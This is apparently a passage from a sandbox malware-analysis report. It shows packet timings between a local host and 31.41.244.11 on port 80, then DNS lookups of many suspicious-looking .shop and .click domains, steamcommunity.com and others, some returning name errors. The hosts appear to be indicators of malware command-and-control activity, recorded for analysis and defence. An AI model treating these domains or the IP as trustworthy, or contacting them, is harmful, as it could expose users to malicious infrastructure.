Jan 7, 2025 10:09:13.590332985 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590344906 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590359926 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.590387106 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.590400934 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.590421915 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590434074 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590480089 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.590480089 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.590512037 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590528965 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590538979 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590559006 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.590572119 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590580940 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.590583086 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590589046 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.590627909 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.590810061 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590859890 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590869904 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590881109 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590897083 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.590897083 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.590914965 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.590929985 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.590940952 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590954065 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.590964079 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.591002941 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.591002941 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.591068029 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.591299057 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.591310978 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.591348886 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.591398001 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.591593027 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.591604948 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.591617107 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.591674089 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.591691971 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.591692924 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.591692924 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.591705084 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.591766119 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.591766119 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.591766119 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.593880892 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.593904018 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.593923092 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.593935013 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.593945980 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.593956947 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.593971968 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.593991995 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594005108 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594017029 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594027042 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594027042 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594027996 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594060898 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594062090 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594074965 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594090939 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594108105 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594108105 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594145060 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594145060 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594182014 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594193935 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594207048 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594234943 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594243050 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594243050 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594254017 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594266891 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594278097 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594280958 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594280958 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594295025 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594295979 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594325066 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594352961 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594480991 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594500065 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594517946 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594530106 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594540119 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594540119 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594540119 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594552994 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594563961 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594579935 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594600916 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594600916 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594621897 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594634056 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594644070 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594679117 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594679117 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594729900 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594741106 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594752073 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594774008 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594796896 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594809055 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594811916 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594820976 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594862938 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594862938 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594870090 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594881058 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594898939 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594907999 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594918013 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594929934 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.594942093 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594942093 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.594959021 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.595001936 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.595001936 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.595041990 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.595052958 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.595097065 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.595097065 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.595185995 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.595205069 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.595232964 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.595233917 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.595248938 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.595263004 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.595274925 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.595287085 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.595289946 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.595298052 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.595335007 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.595335007 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.681152105 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.681195974 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.681207895 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.681246996 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.681257963 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.681267023 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.681391001 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.681401968 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.681412935 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.681423903 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.681435108 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.681446075 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.681444883 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.681444883 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.681473017 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.681477070 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.681477070 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.681484938 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.681499958 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.681504011 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.681533098 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.681550980 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.709333897 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709359884 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709382057 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709392071 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709403992 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709417105 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709428072 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709445000 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709459066 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.709515095 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709517002 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.709527969 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709547043 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709558010 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.709578991 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709587097 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.709599018 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709609032 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709619999 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.709619999 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.709639072 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709650993 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709657907 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.709657907 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.709697008 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.709697008 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.709707975 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709728003 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709747076 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709752083 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.709779978 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.709783077 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709794998 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709816933 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.709816933 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.709830046 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.709870100 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709878922 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709884882 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709913015 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709937096 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.709937096 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.709940910 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709953070 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.709956884 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709978104 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709979057 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.709990025 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.709999084 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.710000038 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.710017920 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.710031033 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.710036993 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.710053921 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.710064888 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.710094929 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.710094929 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.710099936 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.710122108 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.710131884 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.710141897 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.710158110 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.710185051 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.710185051 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.710194111 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.710205078 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.710217953 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.710217953 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.710257053 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.710258007 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.710326910 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.710562944 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.710572958 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.710608006 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.710887909 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.710896969 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.710906029 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.710916042 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.710926056 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.710941076 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.710953951 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.710980892 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.711029053 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.711054087 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.711076975 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.711090088 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.711090088 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.711132050 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.711143017 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.711158037 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.711167097 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.711177111 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.711241961 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.711241961 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.711261988 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.711949110 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.711965084 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.712002993 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.712002993 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.712074041 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.712084055 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.712093115 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.712125063 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.712133884 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.712145090 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.712145090 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.712187052 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.712198973 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.712198973 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.712207079 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.712219000 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.712229013 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.712244034 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.712285995 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.712285995 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.712285995 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.712327957 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.712340117 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.712348938 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.712387085 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.712387085 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.712460995 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.712517023 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.712552071 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.712552071 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.712621927 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.712670088 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.712690115 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.712701082 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.712711096 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.712721109 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.712749958 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.712769985 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.712769985 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.713051081 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.713058949 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.713119030 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.713119030 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.713148117 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.713165998 CET	50019	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:13.713170052 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.713181019 CET	80	50019	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:13.713188887 CET	80	50019	31.41.244.11	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 10:08:15.597795010 CET	192.168.2.4	1.1.1.1	0x2560	Standard query (0)	fluid-draw.sourceforge.io	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:16.394525051 CET	192.168.2.4	1.1.1.1	0x97e5	Standard query (0)	fancywaxxers.shop	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:16.522326946 CET	192.168.2.4	1.1.1.1	0x4732	Standard query (0)	nearycrepso.shop	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:16.604459047 CET	192.168.2.4	1.1.1.1	0xc87a	Standard query (0)	abruptyopsn.shop	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:16.638894081 CET	192.168.2.4	1.1.1.1	0x94fc	Standard query (0)	wholersorie.shop	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:16.685755968 CET	192.168.2.4	1.1.1.1	0x4d29	Standard query (0)	framekgirus.shop	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:16.735053062 CET	192.168.2.4	1.1.1.1	0xe9cd	Standard query (0)	tirepublicerj.shop	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:16.765492916 CET	192.168.2.4	1.1.1.1	0xac1a	Standard query (0)	noisycuttej.shop	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:16.824647903 CET	192.168.2.4	1.1.1.1	0xae40	Standard query (0)	rabidcowse.shop	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:16.871263027 CET	192.168.2.4	1.1.1.1	0x6870	Standard query (0)	cloudewahsj.shop	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:16.884952068 CET	192.168.2.4	1.1.1.1	0xdccf	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:18.344892025 CET	192.168.2.4	1.1.1.1	0x16a4	Standard query (0)	sputnik-1985.com	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:23.212801933 CET	192.168.2.4	1.1.1.1	0xeafb	Standard query (0)	undesirabkel.click	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:42.095169067 CET	192.168.2.4	1.1.1.1	0xde6b	Standard query (0)	cureprouderio.click	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:49.703496933 CET	192.168.2.4	1.1.1.1	0xd666	Standard query (0)	vanaheim.cn	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 10:08:15.607074022 CET	1.1.1.1	192.168.2.4	0x2560	No error (0)	fluid-draw.sourceforge.io	prwebsecure.sourceforge.io.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 7, 2025 10:09:16.403294086 CET	1.1.1.1	192.168.2.4	0x97e5	Name error (3)	fancywaxxers.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:16.530946970 CET	1.1.1.1	192.168.2.4	0x4732	Name error (3)	nearycrepso.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:16.613579035 CET	1.1.1.1	192.168.2.4	0xc87a	Name error (3)	abruptyopsn.shop	none	none	A (IP address)	IN (0x0001)	false
